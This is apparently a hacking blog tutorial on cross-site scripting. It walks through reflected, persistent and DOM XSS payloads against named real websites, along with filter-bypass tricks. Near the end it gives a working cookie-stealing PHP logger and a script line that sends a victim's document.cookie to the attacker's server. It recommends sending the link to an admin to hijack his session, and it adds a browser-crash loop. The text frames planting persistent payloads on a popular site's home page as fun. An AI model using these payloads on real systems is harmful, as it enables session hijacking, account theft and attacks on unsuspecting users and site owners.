XSS Persistent with Details
What is XSS?
XSS, also known as CSS, stands for Cross Site
Scripting. It is a vulnerability where attacker can inject client-side
script into Web pages viewed by other users. With it, we can execute
JavaScript on the remote machine. JavaScript is very powerful, and I
highly recommend you learn it first before attempting XSS. You will
understand everything better. By injecting malicious scripts, we can
gain elevated access-privileges to sensitive page content, such as
cookies, that are kept by the browser. Therefore, we can hijack
sessions.
==============================================
What types of XSS exist?
==============================================
Non Persistent
====================
Non persistent is also known as Reflected XSS. When we
execute it, it doesn't stay in the page. In order for it to have any
effect, we must send the link to the vulnerable page. Our malicious
vector has to be in that link. How does reflected XSS work? Simple. Web
pages are designed to take input from users. For example, when you
search in some search bar, it will say "No results for" + your input.
Here it reflects what you said. There are a lot of
places where page might reflect our input. You are supposed to view
source of the code, escape their tags, and open your own.
==============================================
Persistent XSS
====================
XSS vulnerability is persistent, if your malicious
script stays on the site where you executed it. For example, if HF had
xss vulnerability in threads, if I input malicious vector in thread
name, everyone who opens this thread will be infected. It stays there
forever. That's why it is called persistent. Attacker doesn't have to
include his vector in the url he sends to the victim.
==============================================
DOM Based XSS
====================
DOM-based vulnerabilities occur in the content
processing stages that are performed by the client. The name refers to
representing HTML or XML contents and that is called the
Document-Object-Model ( Therefore, we get DOM).
==============================================
XSS
====================
When searching for XSS vulnerability, your main
objective is to get the page to open an alert box. To do that your often
have to bypass many HTML tags in that page. Your base script is:
<script>alert("XSS")</script>
Every time you do XSS, you are supposed to type that.
Then you must look at the source code, see where it reflects out vector,
bypass their tags, and alert saying "XSS" will be created. You should
switch to Firefox when searching for XSS Vulnerabilities because Chrome
has additional filters.
For the first example, we will be taking
http://www.osby.se/.
Type <script>alert(0)</script>
in the main search engine. Nothing happens. Right click
on the page>view source code. Press Control+F, and type "alert(0)"
to see where page reflects our vector.
This is what I got:
<form action="http://www.osby.se/soksida/?q=%3cscript%3ealert(0)%3c/script%3e" method="post" class="search">
<div>
<label class="structural" for="searchquery">Sök på webbplatsen...</label>
<input class="text" type="text" name="searchquery" value="<script>alert(0)</script>" />
<input type="submit" class="button" value="Sök" />
</div>
</form>
Our input is being reflect in two places, inside input,
under Value="" and inside Form Action. Not let's take a look at what
page does. Let's look at <form action> first. It put a quotation
mark, then link to the search bar, and then our content. At the end it
finished with putting another quotation mark. So, action equals
everything that is under quotation marks. Meaning, if we type our own
quotation mark in the search bar, page will think that action=""
finishes there. We will have our <script>alert(0)</script>
outside of it.
Now let's look at the input tag. Our script is reflected under value=""
This is the same situation. It took our input and put a
quotation mark before and after it. If we place our own quotation mark,
it will think that value ends there. I'll explain with example:
Value="Is this vulnerable?" is how it normally looks like. Now let's type this is the search bar:
Is " this vulnerable?
Source will now look like this:
Value="Is" this vulnerable
This vulnerable is OUTSIDE of value. Meaning that we have successfully escaped it.
Let's get back to osby site, and exploit the
vulnerability. Type "<script>alert(0)</script> in the search
bar, and it will execute and create an alert box.
<form action="http://www.osby.se/soksida/?q="><script>alert(0)</script>" method="post" class="search">
<div>
<label class="structural" for="searchquery">Sök på webbplatsen...</label>
<input class="text" type="text" name="searchquery" value="" /><script>alert(0)</script>" />
<input type="submit" class="button" value="Sök" />
</div>
</form>
We tricked the page into thinking that value ended, and then we entered our malicious script.
Now, let's take popular shopping site Toronto for
example. Type <script>alert("XSS")</script> in the main
search engine. Look at the source. It reflects our input in a lot of
places, but I will post only one.
<script type="text/javascript" charset="utf-8">
var pageOptions = {
'pubId': 'pub-6986100390200519',
'query': '<SCRIPT>alert("XSS")</SCRIPT>'
This doesn't do anything. But if we take a closer look,
we will see that we are inside script tag. What we can do, is close
that tag with </script> and open a new one for ourselves.
Therefore, the source will look like this:
<script type="text/javascript" charset="utf-8">
var pageOptions = {
'pubId': 'pub-6986100390200519',
'query': '</SCRIPT><SCRIPT>alert("XSS")</SCRIPT>'
It closed their tag, and opened our own. Alert box will pop up saying XSS.
When doing Reflected XSS, you must always keep an eye
on the url. Why? Because sometimes you can inject your vector through
url, if the page reflects our input. Meaning that you should sometimes
paste your vector after you see "=" for example, and you might get and
alert box.
Let's take site Prva.rs for example. While browsing it,
I found archive, where it has options to show content from day, month
and year.
http://www.prva.rs/sr/vesti/video.html?day=&month=3&year=2012&Submit=
So let's inject <script>alert(0)</script> in the url. Let's look at the source and search for our vector.
<li><a
href="/sr/vesti/video.html?month=3&year=2012&day=<script>alert("-Divine-")</script>&position=1">2</a></li>
As we can see, href started with ", meaning that we
should close it with our own quotation mark. But after doing just that
it won't work. Upon inspecting the source code even more, I found out
that we were already inside script tag. Meaning that we must close that
as well. Final vector is:
"</SCRIPT><SCRIPT>alert("-Divine-")</SCRIPT>
This closes their quotation mark, then it closes the script tag, and opens our own.
<li><a
href="/sr/vesti/video.html?month=3&year=2012&day="</SCRIPT><SCRIPT>alert("-Divine-")</SCRIPT>&position=1">2</a></li>
We made it close href, then close script, and then open another one with our malicious code.
Filters
We have now learned the basics. But not always will "
<> and words Script and alert be allowed. There are many things
used to stop us from injecting our vector. I will explain filters you
will face in future, and how you can bypass them.
Magic Quotes
When magic_quotes_gpc is on, it means that the server doesn't allow characters: ", / and '
to bypass it we use :
String.fromCharCode()
We write our code, in the () crypted in ASCII
exemple :
String.fromCharCode(88,83,83)
88, 83,83 is "XSS" Crypted.
And we use it like this: <script>alert(String.fromCharCode(88,83,83))</script>
Let's take http://www.osby.se for example again. In the
beginning of the thread we exploited the vulnerability by using
"<script>alert(0)</script>
Notice how I intentionally used 0 instead of word
"XSS". If we just try to change that 0 to some text, "XSS" for example,
it won't create an alert box. Why? Because it doesn't allow quotation
marks. To bypass that we use:
"<script>alert(String.fromCharCode(88,83,83))</script>
We will get an alert box saying XSS.
We can also bypass it in another way. We can use / instead of ".
<script>alert(/XSS/)</script> will execute, but it will show // in alert box.
Bypassing with Full HTTP
You can sometimes bypass some filters by encoding your
vector in full HTTP. You can use the tool "Coder" to do encode it in
full HTTP.
Word Blocking
Sometimes pages won't allow words like "Script" to be
typed on the page. When this happens, you should use something else to
get alert box. Learn JavaScript if you want to understand this better.
Let's take site: http://www.frageugen.at/index.php?page= for example.
http://www.frageugen.at/index.php?page=<script>alert(0)</script>
Source will look like this:
<strong><script>alert(0)<Controller</strong> not found!</td
As you can see, it blocked our </script>. We can
bypass this by using different type of XSS. We will use <Iframe>
to execute our script. Type <Iframe src='javascript:alert(0)'> in
the url. Alert box will pop up.
Sometimes, this type of filtration can be bypassed by
capitalizing some of the letters inside the word. For example
</ScRIpT>.
Filtration of <>
When this happens we can't open our own tag. This
usually happens under <input>. When this is the case, we use
onclick, onmouseover etc.
Let's take this site for example:
http://store.acmilan.com/en/frontend/homepage/search?keywords=
Type <script>alert(0)</script>. Look at the source:
<input type='text' id='q' class='input' name='keywords' value='<script>alert(0)</script>' />
So to bypass this, we must first escape value. This
time it isn't ", it is only '. Look at the source code. Then we must
make onmouseover, and make it run javascript. We do that with
onmouseover='javascript:alert(0)'
Every time user hovers his mouse over the search bar, alert will open.
The final vector will look like:
' onmouseover='javascript:alert(0)'
Hover your mouse over the search bar, and alert will pop up.
Persistent XSS
Persistent XSS stays in the site, and therefore much
more users might click it. It is more dangerous. Let's take site
Fandom.com for example. Register there, and go submit fanart. Use your
vector in name of the picture and in description.
Escape all filters and tags to make alert box pop up.
Then upload your picture. Everyone who visits that picture, will have
alert pop up. But this is even better! The site has "Most recent Fan
Art" in the home page. Meaning that all recent fan art and it's name
will be listed in the main page. Therefore, EVERYONE will see the pop
up. Pretty cool right?
Persistent XSS is more rare and difficult to find than
reflected XSS. But even if that's correct, that doesn't mean it can't be
found in huge sites like Google. Here's persistent XSS my team,
Antagonism and I found in Google:
http://www.google.com/ig/directory?url=freecamshows.x90x.net/user.xml
How did we do it? Google has page where users can
submit their own gadgets. Users must code them in xml, upload them
somewhere else, and them click add a new gadget from that url. I HAVE
ALREADY CONTACTED GOOGLE ABOUT THIS, IT ISN'T DANGEROUS BECAUSE THAT
PART OF GOOGLE IS ISOLATED AND SANDBOXED.
DOM Based XSS
Let's take http://xss-quiz.int21h.jp/stage-3.php?sid=070592ea16c753e30346544e24b9ae0c64d7f8aa for example. This is stage #3.
Install firefox add-on called "Tamper data". Now type
<script>alert(document.domain);</script> in the search box.
Nothing will happen. Start Tamper Data addon and click "Start Tamper".
Now type <script>alert(document.domain);</script> in the
search bar again. Tamper Data will ask you if you want to Tamper. Click
"Tamper" Button. Now, on the right side of the screen, paste your vector
in every one of these boxes that show up, and then press enter. Page
will load, and JavaScript will be executed.
What Can I Do With XSS?
Cookie stealing:
Right click on the desktop, and create a new file. Paste this code into that file
[code]
<?php
$cookie = urldecode($_GET['c']);
$fp = fopen("log.txt", "a");
$cookie = $cookie . ": ".$_SERVER['REMOTE_ADDR']." at ".date("r",time())."\n";
fwrite($fp, "$cookie \n");
fclose($fp);
header("Location: http://google.com ");
?>
[/code]
Now click file>save as> CLogger.php
It's very important to save it as .php.
Then again, make a new text file. Let it remain empty
for now. Name it "CookieLog.txt". Now go make an account at x90x.net.
Find file manager, and click upload. Upload both of these files. Then
select both of them, and click chmod. Change mode to '777'.
That's it. When you want to steal someone's cookies, use this vector:
<script>document.location="http://www.mysite/CLogger.php?cookie=" + document.cookie;</script>
Send the link to someone. Sending it to admin would be
the best case scenario. If he clicks it, your text file will update with
his cookie. Then you can use Firefox Addon "Cookie Manager" to inject
the cookie in your browser and hijack his session.
XSS Worm
Imagine how great it would be if you could create a
worm that would make users PM everyone on their friend list with your
cookie stealing vector. You would have hundreds, if not thousands of
clicks in a few minutes.
I'm not gonna cover this, because it would take too much time and space. So read this tutorial written by AntiPaste.
XSS Crash - By Mario
Use this vector:
<script>var x=120;while(x>0){document.location="mailto:";x--;}</script>
It will open a large number of Microsoft Office Outlook to send emails. This will crash the PC.
No comments
Please do not enter any spam link in comment box.